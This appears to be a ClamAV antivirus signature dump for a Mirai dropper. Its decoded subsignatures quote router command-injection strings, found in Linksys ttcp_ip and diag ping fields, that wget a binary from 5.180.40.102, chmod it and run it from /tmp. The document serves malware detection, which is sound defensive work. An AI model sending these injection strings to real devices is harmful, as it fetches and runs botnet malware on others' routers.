VIRUS NAME: Unix.Dropper.Mirai-7135998-0
TDB: Engine:51-255,Target:6
LOGICAL EXPRESSION: 0&1&2&3&4
 * SUBSIG ID 0
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
liunx.mpps+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1
 * SUBSIG ID 1
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://5.180.40.102/vb/liunx.mpps+-O+/tmp/...;sh+/tmp/.
 * SUBSIG ID 2
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
Host: 5.180.40.102:80
 * SUBSIG ID 3
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+liunx.mpps%3B+wget+http%3A%2F%2F5.180.40.102%2Fvb%2Fliunx.mpps%3B+chmod+777+liunx.mpps%3B+.%2F
 * SUBSIG ID 4
 +-> OFFSET: ANY
 +-> SIGMOD: NONE
 +-> DECODED SUBSIGNATURE:
..`&ipv=0
